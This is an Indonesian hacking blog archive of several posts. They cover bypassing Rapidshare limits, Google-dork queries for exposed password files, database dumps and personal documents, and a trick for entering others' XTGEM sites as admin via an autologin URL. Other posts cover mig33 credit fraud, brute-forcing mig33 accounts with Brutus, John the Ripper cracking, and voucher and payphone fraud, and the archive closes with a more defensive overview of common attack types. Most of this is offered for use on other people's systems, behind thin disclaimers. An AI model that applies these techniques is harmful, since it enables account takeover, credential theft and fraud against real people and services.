ini adalah file file downloader untuk rapidshare, aku belom pernah ngeterst, tapi mending pake yang di atas itu
hide ip platinum – nah dengan menggunakan tools ini baru bener bener canggih, dimana tu rapidshare bener bener ketipu, asalkan aja kita punya proxy server yang bagus untuk download, caranya, kita pake browser firefox untuk download rapidshare, lalu jalankan program ini, dan gunakan browser IE untuk mendownload file berikutnya, lumayan dengan begini kita bisa mendownload 2 file sekaligus….ya ngga…
del cookies..
yap, ini untuk membersihkan cookies yang ada di browser IE

sisanya aku ngga tau nih….ada yang mau share ?? pls submit in comment….

thanks

oh ya, kalo mau download programnya , download disini

update, ini ada yang terbaru… tapi harus pake firefox browser…

untuk firefox doang…… browser laen sux

1. install ‘Greasemonkey’ :

http://ftp.mozilla.org/pub/mozilla.org/extensions/greasemonkey/greasemonkey-0.5.\

3-fx.xpi

2. restart firefox

3. browse ke :

http://userscripts.org/scripts/source/1881.user.js

4. klik ‘Tools’ – ‘Install User Script’ – klik ok

5. browse ke :

http://userscripts.org/scripts/source/1940.user.js

6. klik ‘Tools’ – ‘Install User Script’ – klik ok

7. restart firefox

8. cobain deh buka link megaupload & rapidshare
(catatan kalo rapidshare tetep hrs klik free)

9. enjoy

–
http://www.myraffaell.com

2010-08-18T22:31:00.000-07:00

Tools berbahaya dari Google

Based on: Dangerous Google – Searching for Secrets by:Michał Piotrowski

Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.

dari tutorial ini yang akan didapatkan adalah:

Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya
Bagaimana cara mencari informasi tentang vulnerable systems and Web services
Bagaimana cara mencari publicly available network devices.

Hal pertama dari yang harus di ketahui adalah Google Query Operators
Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya….

site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox —> akan mencari kata fox di situs google.com

intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire

allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire

inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox

allinurl
Sama dengan Allintitle (hanya ini url)

filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire

contoh keren: filetype:doc skripsi IT

numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire

link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com

inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire

kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * – + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )

nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……

Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
“Apache/1.3.28 Server at” intitle:index.of
–> Apache 1.3.28

“Apache/2.0 Server at” intitle:index.of
–> Apache 2.0

“Apache/* Server at” intitle:index.of
–> semua versi dari Apache

“Microsoft-IIS/4.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 4.0

“Microsoft-IIS/5.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 5.0

“Microsoft-IIS/6.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 6.0

“Microsoft-IIS/* Server at” intitle:index.of
–> semua versi dari Microsoft Internet Information Services

“Oracle HTTP Server/* Server at” intitle:index.of
–> semua versi dari Oracle HTTP Server

“IBM _ HTTP _ Server/* * Server at” intitle:index.of
–> semua versi dari IBM HTTP Server

“Netscape/* Server at” intitle:index.of
–> semua versi dari Netscape Server

“Red Hat Secure/*” intitle:index.of
–> semua versi dari the Red Hat Secure server

“HP Apache-based Web Server/*” intitle:index.of
–> semua versi dari the HP server

Beberapa Bug pada Skripts dapat ditemukan google:
“Generated by phpSystem”
–> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points

“This summary was generated by wwwstat”
–> web server statistics, system file structure

“These statistics were produced by getstats”
–>web server statistics, system file structure

“This report was generated by WebLog”
–>web server statistics, system file structure

intext:”Tobias Oetiker” “traffic analysis”
–>system performance statistics as MRTG charts, network configuration

intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
–>server version, operating system type, child process list,current connections

intitle:”ASP Stats Generator *.*” ”
–>ASP Stats

Generator” “2003-2004 weppos”
–>web server activity, lots of visitor information

intitle:”Multimon UPS status page”
–>UPS device performance statistics

intitle:”statistics of” “advanced web statistics”
–>web server statistics, visitor information

intitle:”System Statistics” +”System and Network Information Center”
–>system performance statistics as MRTG charts, hardware configuration, running services

intitle:”Usage Statistics for” “Generated by Webalizer”
–>web server statistics, visitor information, system file structure

intitle:”Web Server Statistics for ****”
–>web server statistics, visitor information

inurl:”/axs/ax-admin.pl” -script
–>web server statistics, visitor information

inurl:”/cricket/grapher.cgi”
–>MRTG charts of network interface performance

inurl:server-info “Apache Server Information”
–>web server version and configuration, operating system type, system file structure

“Output produced by SysWatch *”
–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs

Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.

“A syntax error has occurred” filetype:ihtml
–>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords

“Access denied for user” “Using password”
–>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code

“The script whose uid is ” “is not allowed to access”
–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information

“ORA-00921: unexpected end of SQL command”
–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information

“error found handling the request” cocoon filetype:xml
–>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information

“Invision Power Board Database Error”
–>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code

“Warning: mysql _ query()” “invalid query”
–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information

“Error Message : Error loading required libraries.”
–>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information

“#mysql dump” filetype:sql
–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents

Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google

“http://*:*@www”
site passwords for site, stored as the string

“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, berpotensial untuk mengambil user names and passwords

intitle:”Index of” pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords

inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup

“Index of/” “Parent Directory” “WS _ FTP.ini” filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords

ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
Terdapat Microsoft FrontPage passwords

filetype:sql (“passwd values ****” |”password values ****” | “pass values ****” )
Terdapat SQL code and passwords yang disimpan dalam a database

intitle:index.of trillian.ini
configuration files for the Trillian IM

eggdrop filetype:user
user configuration files for the Eggdrop ircbot

filetype:conf slapd.conf configuration files for OpenLDAP

inurl:”wvdial.conf” intext:”password” configuration files for WV Dial

ext:ini eudora.ini configuration files for the Eudora mail client

filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information

intext:”powered by Web Wiz Journal”
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/

“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/

intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board”
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
– dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php

Mencari Dokumen khusus ?
filetype:xls inurl:”email.xls” email.xls
files, berpotensial untuk mengambil contact information

“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs

“not for distribution”
confidential documents containing the confidential clause

buddylist.blt
AIM contacts list

intitle:index.of mystuff.xml
Trillian IM contacts list

filetype:ctt “msn”
MSN contacts list

filetype:QDF
QDF database files for the Quicken financial application

intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail

“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc. On the Net

untuk lebih kreatifnya bisa di coba coba sendiri, okeh

reference:

http://johnny.ihackstuff.com – largest repository of data on Google hacking,
http://insecure.org/nmap/ – Nmap network scanner,
http://thc.org/thc-amap/ – amap network scanner.

http://www.myraffaell.com

Hacking site XTGEM

2010-08-18T22:20:00.000-07:00

Kelemahan site xtgem adalah adanya halaman yang di ketahui bot google dengan membiarkan usernya melakukan auto login, kelemahan ini lah yang di manfaatkan untuk menjebol site tersebut, dengan sedikit dan ketepatan memasukan kata di mesin pencari google, maka dengan mudahnya kita meng hack site xtgem

Mungkin teman teman pembaca sudah tidak asing lagi dengan artikel yang ku tulis kali ini, bahkan mungkin juga ada yang menyebutnya jadul, ya karna trik ini sudah lama sekali dan bukan yang terbaru, tapi bagi saya pribadi, selama trik ini masih berjalan dan bisa di lakukan, apa salahnya saya ulas kembali, khususnya bagi yang belum mengetahui, mudahnya menjebol site xtgem hanya dengan media google,

Semoga artikel ini dapat membantu anda yang sedang ingin membuat site agar lebih berhati hati sekali Karna teman teman saya pun banyak yang mempunyai site xtgem, terlanjur kebobolan

Sebelumnya, entah itu di forum ataupun di blog blog sering membahas cara hack site xtgem dengan dalih pembelajaran, tapi taukah anda tak sedikit pula yang memanfaatkannya untuk tindakan yang tidak benar

Oke langsung saja

Bagaimana seh caranya?, bisa di bilang sangat mudah, anda tidak perlu shoftware khusus untuk melakukannya hanya dengan search engine google saja anda dapat menjebol site xtgem,

Coba ketikan kata ini di mesin pencari google allinurl:xtgem.com/autologin maka akan tampil beberapa judul site xtgem, lalu setelah itu ketik temblok, dan anda akan dibawa masuk langsung kebagian panel,

otomatis dengan cara ini anda sudah masuk sebagai admin xtgem tersebut dan anda bebas mengoprek oprek isi site tersebut

Jangan di salah gunakan dan Semoga bermanfaat….

http://arrew.wordpress.com

TRICK NAMBAH KREDIT MIG33

2010-08-18T22:18:00.000-07:00

TRICK NAMBAH KREDIT MIG33.. Caranya.. Kmu daftarkan nmr hp ngarang ke mig33 stl itu biarkan selama beberapa bulan. Kemudian kmu log in ke app. Mig33 dan klik REMIND ME LATER dan check kredit di MY ACCOUNT. klo kredit atau balance sdh banyak, km kemudian klik RESEND CODE dan gnti nmr hp yg ngarang dg nmr hp kmu yg blm didaftar ke mi33. Stl km dpt codenya, kmu aktif kan kodenya. Thanks

Cara menggunakan Brutus

2010-08-18T22:03:00.000-07:00

Caranya.. Jalankan Brutus. Buka targetnya www.mig33.com 172.016.110.110 dan 192.168.110.110 kmdian pilih netbus. Port 94720. Passmode pilih combo list.
Di file Combo tulis nama2 nick yg akan kmu hack. Stl itu pass file ditulis dg Combo list yg sdh kmu ubah tadi. Thx

Tutorial John the Ripper

2010-08-16T23:46:00.000-07:00

Pengenalan
----------
John the Ripper merupakan password cracker yang cepat. JTR tersedia
pada berbagai
platform baik *nix, DOS, win32. Tujuan utamanya adalah mendeteksi
kelemakan
password pada Unix. Tetapi JTR juga dapat mengcrack password pada Win
NT/2000/XP
yang berbentuk LM hashes.

Bagi yang belum mempunyai JTR, anda dapat download disini:
- http://www.openwall.com/john/

Ada beberapa hal penting pada JTR
[passfile] - Nama dari password file anda
[wordlist] - Kumpulan kata-kata
[output] - Hasi decrypt password
[session name] - Nama yang anda gunakan untuk menyimpan session

-- contoh Pasword File: passwd.txt --
root:VwL97VCAx1Qhs:0:0:root:/root:/bin/bash
user:aH0qcQOVz7e0s:515:100:user:/home/user:/bin/bash
lin:iWuSGrtezXz0E:515:100:lin:/home/lin:/bin/bash
-- contoh Pasword File: passwd.txt --

Note: Simpan [passfile] di folder yang sama dengan file execute JTR
Hal ini untuk mempermudah penggunaan JTR :)

Terdapat 3 mode pada JTR untuk mendecrypt password
1. Single Mode
Pada Single Mode, JTR akan berusaha mencari Password yang paling
lemah dari seluruh password. Cara ini merupakan cara yang paling
cepat.

Syntax single mode
- john -single [passfile]
atau
- john -si [passfile]

Co: Anda mempunyai password file passwd.txt
Maka penggunaannya : john -si passwd.txt

2. Wordfile Mode
Wordfile Mode merupakan cara tercepat ke 2. Wordfile Mode membutuhkan
kamus kata-kata.

Wordfile syntax
john -wordfile:[wordlist] [passfile]
atau
john -w:[wordlist] [passfile]

Co: Anda mempunyai password file passwd.txt dan mempunyai kamus kata words.lst
john -w:words.lst passwd.txt

3. Incremental Mode
Incremental Mode merupakan cara yang paling lambat dan berusaha untuk
mendecrypt semua password, akan memakan waktu berhari-hari, bermingu-minggu,
bahkan berbulan-bulan (berlebihan gak ya :p). Sebaiknya anda menggunakan
cara ini apabila 2 cara sebelumnya gagal.
Terdapat 4 perintah dasar dalam penggunaannya
a. digits: Akan mencoba mendecrypt semua password dengan karakter angka
b. alpha: Akan mencoba mendecrypt semua password dengan karakter huruf
c. all: Akan mencoba mendecrypt semua password dengan semua karakter
termasuk karakter spesial, co: @!^&?
d. tidak memilih mode: Akan mencoba mendecrypt password dengan segala cara

Syntax:
john -i [passfile]
john -i:DIGITS [passfile]
john -i:ALPHA [passfile]
john -i:ALL [passfile]

Co: Anda mempunyai password file passwd.txt
john -i passwd.txt
john -i:DIGITS passwd.txt
john -i:ALPHA passwd.txt
john -i:ALL passwd.txt

Mode lainnya pada JTR
- Show Mode
Setelah anda mendapatkan password yang telah di decrypt, anda dapat menyimpannya
pada file tertentu.

Syntax:
john -show [passfile]>[output]

Co: Anda mempunyai password file passwd.txt dan ingin menghasilkan output hasil.txt
john -show passwd.txt>hasil.txt

Anda juga dapat melihat langsung hasil decrypt dari JTR.

Syntax:
john -show [passfile]

Hasilnya terlihat seperti berikut:

root:root:0:0:root:/root:/bin/bash
user:company:515:100:user:/home/user:/bin/bash
lin:rootme:515:100:lin:/home/lin:/bin/bash
3 passwords cracked, 0 left

- Menghentikan JTR
Untuk menghentikan JTR anda dapat menekan CTRL+C

- Rules
Digunakan bersamaan dengan wordfile mode, tanpa rules JTR hanya akan mencoba
kata-kata yang terdapat pada wordlist. Apabila anda mengaktifkannya maka JTR
akan mencoba variasi dari kata2 pada wordlist.

Syntax
john w:[wordlist] -rules [passfile]

- Session & Restore
Mendecrypt password dapat memakan waktu sangat lama. Anda dapat menghentikan
JTR dengan CTRL+C, kemudian di lain waktu dapat dilanjutkan kembali dengan
syntax restore. Dengan melakukan hal tersebut akan membawa JTR kembali ke
session terakhir.

Syntax
john -restore
john -restore:[session name]
john -session:[session name]

- Saat melakukan cracking, JTR hanya menampilkan kursor yang berkedip.Apabila
anda ingin melihat sampai dimana JTR bekerja, anda dapat menekan "sembarang
tombol", JTR akan menampilkan status terakhir.

- Semua password yang pernah di crack disimpan JTR di john.pot

Anda bisa mendapatkan Wordfile di site-site berikut:
1. http://www.openwall.com/passwords/wordlists/

2. http://www.sparkleware.com/lists.html

3. http://ftp.cerias.purdue.edu/pub/dict/local/

4. ftp://sable.ox.ac.uk/pub/wordlists/

5. http://www.theargon.com/archives/wordlists/theargonlists/

Referensi AKA Bacaan:
1. Dokumentasi JTR
2. http://www.openwall.com/john/
3. http://securitysite.host.sk/jtr.html

Trik isi ulang voucher

2010-08-16T23:43:00.000-07:00

CARA ISI PULSA 1 VCR KE BNYK HP..
Masukan kde vcr ke beberapa hp yg op. sama. lalu tkan tmbl panggil secara bersama an. jngn sampai telat.

Nelpon lokal gratis via telp umum

2010-08-16T23:42:00.000-07:00

Kmu cari dlu telpon umum nya. Klo trick ini gagal, cari telp. Umum lain..
Caranya.. Angkat dlu gagang telp. Tekan tmbol angka 142 atau nmr free call apa saja. klo dh bunyi nada stand by off, lalu tkan angka 1111111111.. Yg bnyk dan dg kecepatan konstant. Klo dh bunyi, kmu dial nmr tujuan lokal. Klo blm bunyi, cba lagi.. Tdk semua telp. Umum bisa.

15 Jenis Serangan Cracker

2010-08-16T23:40:00.001-07:00

15 Jenis Serangan Cracker

Seringkali ketika kita menemukan kerawanan ataupun missconfiguration pada system sendiri, kita akan menganggap hal itu adalah hal yang kecil, karena kita menanggapinya bukan sebagai lubang keamanan. Tools maupun teknik yang digunakan cracker kebanyakan adalah variasi dari serangan yang mereka lakukan sebelumnya. Sebagai Administrator baik system maupun jaringan ataupun end user, Anda haruslah banyak belajar dari pengalaman penyerangan yang terjadi sebelumnya (walaupun serangan tersebut terjadi pada orang lain) untuk menghindari serangan yang akan terjadi berikutnya.

Mengetahui jenis serangan sangat penting untuk menjaga stabilitas system, sehingga anda tidak perlu repot untuk menginstall system baru agar lebih aman, anda hanya perlu mempatch atau bahkan sedikit mengkonfigurasi system anda Mungkin bagi beberapa orang tulisan ini merupakan tulisan yang sangat mendasar, tapi tidak ada salahnya jika anda sebagai seorang Profesional untuk mereview sesuatu yang dasar dari waktu ke waktu.. Artikel ini bukan ditujukan untuk menyerang tetapi sebaliknya yaitu untuk bertahan, karena menurut hemat saya untuk bertahan anda harus tahu cara menyerang. Dalam artikel ini terdapat serangan yang sering dilakukan oleh cracker dan disetiap serangan mempunyai metode-metode tersendiri, contohnya saja dalam melakukan IP spoofing yang mempunyai banyak metode diantaranya man in the middle attack. Dengan alasan diatas saya akan mencoba menggaris besarkan seranganserangan umum yang sering dilakukan cracker dan harus diketahui oleh seorang Administrator maupun end user, sedangkan metode-metode yang lebih spesifik mungkin akan saya tuangkan dalam tulisan saya berikutnya baik itu penyerangan ataupun metode yang dilakukan untuk bertahan. Saya tahu tulisan berikut adalah jauh dari sempurna, untuk itu saran dan kritik sangat saya harapkan.

IP Spoofing

IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker Protokol yang menangani komunikasi antar komputer kebanyakan berhasil di spoof. ICMP (Internet Control Message Protocol) adalah salah satunya(vulnerable) karena protokol ini dilewati oleh informasi dan pesan-pesan kesalahan diantara dua node dalam network. Internet Group Message Protocol(IGMP)
dapat dieksploitasi dengan menggunakan serangan tipe ini karena IGMP melaporkan kondisi kesalahan pada level user datagram, selain itu juga protokol ini mengandung Informasi routing dan Informasi Network. (UDP) User Datagram Protocol juga dapat ‘diminta’ untuk menampilkan identitas host sasaran.

Solusi untuk mencegah IP spoofing adalah dengan cara mengamankan packet-packet yang ditransmisikandan memasang screening policies. Enkripsi Point-to-point juga dapat mencegah user yang tidak mempunyai hak untuk membaca data/packet. Autentikasi dapat juga digunakan untuk menyaring source yang legal dan bukan source yang sudah di spoof oleh attacker. Dalam pencegahan yang lain, Admininistrator dapat menggunakan signature untuk paket-paket yang berkomunikasi dalam networknya sehingga meyakinkan bahwa paket tersebut tidak diubah dalam perjalanan.

Anti Spoofing rules(peraturan anti spoof) yang pada dasarnya memberitahukan server untuk menolak packet yang datangnya dari luar yang terlihat datangnya dari dalam, umumnya hal ini akan mematahkan setiap serangan spoofing.

FTP Attack

Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service.

Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bias membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang.

Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow.

Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack(menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam system.

Unix Finger Exploits

Pada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.

Flooding & Broadcasting

Seorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bias menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.

Attacker sering kali menggunakan serangan flooding ini untuk mendapatkan akses ke system yang digunakan untuk menyerang network lainnya dalam satu serangan yang dinamakan Distributed Denial Of Service(DDOS). Serangan ini seringkali dipanggil smurf jika dikirim melaluli ICMP dan disebut fraggles ketika serangan ini dijalakan melewati UDP.

Suatu node (dijadikan tools) yang menguatkan broadcast traffic sering disebut sebagai Smurf Amplifiers, tools ini sangat efektif untuk menjalankan serangan flooding. Dengan melakukan spoofing terhadap network sasaran, seorang attacker dapat mengirim sebuah request ke smurf amplifier, Network yang di amplifiying(dikuatkan) akan mengirim respon kesetiap host di dalam network itu sendiri, yang berarti satu request yang dilakukan oleh attacker akan menghasilkan pekerjaan yang sama dan berulang-ulang pada network sasaran, hasil dari serangan ini adalah sebuah denial of service yang tidak meninggalkan jejak. Serangan ini dapat diantisipasi dengan cara menolak broadcast yang diarahkan pada router.

TCP-level Flooding (kebanyakan SYN ATTACK) telah digunakan pada bulan februari tahun 2000 untuk menyerang Yahoo!, eBay dll yang menggunakan serangan DDOS(Distributed Denial Of Service). Network yang tidak menggunakan firewall untuk pengecekan paket-paket TCP biasanya bisa diserang dengan cara ini.

Beberapa fungsi penyaringan pada firewall (Firewall Filtering Function) biasanya akan mampu untuk menahan satu serangan flooding dari sebuah alamat IP, tetapi serangan yang dilakukan melalui DDOS akan sulit di cegah karena serangan ini seperti kita ketahui datangnya dari berbagai alamat IP secara berkala. Sebenarnya salah satu cara untuk menghentikan serangan DDOS adalah dengan cara mengembalikan paket ke alamat asalnya atau juga dengan cara mematikan network(biasanya dilakukan oleh system yang sudah terkena serangan sangat parah).

Fragmented Packet Attacks

Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.

Paket yang dipecah juga dapat mengakibatkan suasana seperti serangan flooding. Karena paket yang dipecah akan tetap disimpan hingga akhirnya di bentuk kembali ke dalam data yang utuh, server akan menyimpan paket yang dipecah tadi dalam memori kernel. Dan akhirnya server akan menjadi crash jika terlalu banyak paket-paket yang telah dipecah dan disimpan dalam memory tanpa disatukan kembali. Melalui cara enumerasi tentang topographi network sasaran, seorang attacker bisa mempunyai banyak pilihan untuk meng- crash packet baik dengan cara menguji isi firewall, load balancers atau content – based routers. Dengan tidak memakai system pertahanan ini, network sasaran jauh lebih rawan untuk perusakan dan pembobolan.

Karena paket yang dipecah(fragmented packet) tidak dicatat dalam file log sebelum disatukan kembali menjadi data yang utuh, packet yang dipecah ini memberikan jalan bagi hacker untuk masuk ke network tanpa di deteksi. Telah banyak Intrusion Detection System (IDS) dan saringan firewall(firewall filters) yang memperbaiki masalah ini, tapi masih banyak juga system yang masih dapat ditembus dengan cara ini.

E-mail Exploits

Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).

Serangan mail flood (flood =air bah) terjadi ketika banyak sekali e-mail yang dikirimkan oleh attacker kepada sasaran yang mengakibatkan transfer agent kewalahan menanganinya, mengakibatkan komunikasi antar program lain menjadi tidak stabil dan dapat membuat system menjadi crash. Melakukan flooding merupakan cara yang sangat kasar namun efektif, maksudnya untuk membuat suatu mail server menjadi down. Salah satu jalan yang menarik dalam melakukan serangan mail-flooding adalah dengan mengexploitasi fungsi auto-responder (auto-responder function) yang terdapat dalam kebanyakan aplikasi email, ketika seorang attacker menemukan auto-responder yang sedang aktif dalam dua system yang berbeda, sang attacker bisa saja mengarahkan yang satu ke yang lainnya, karena kedua-duanya di set untuk merespond secara sacara otomatis untuk setiap pesan, maka kedua-duanya akan terus mengenarate lebih banyak e-mail secara loop(bolak-balik) dan akhirnya kedua-duanya akan kelelahan dan down.

Serangan memanipulasi perintah (command manipulation attack) dapat mengakibatkan sebuah system menjadi crash dengan cara menggulingkan mail transfer agent dengan sebuah buffer overflow yang diakibatkan oleh perintah (fungsi) yang cacat (contoh: EXPN atau VRFY). Perbedaan antara mail flood dan command manipulation: command manipulation meng-exploit kekuasaan milik sendmail yaitu memperbolehkan attacker untuk mengakses system tanpa informasi otorisasi(menjadi network admin tanpa diketahui) dan membuat modifikasi pada penjalanan program lainnya. Mengaktifkan command yang cacat seperti diatas juga dapat mengakibatkan seorang attacker mendapatlan akses untuk memodifikasi file, menulis ulang, dan tentunya saja membuat trojan horses pada mail server.

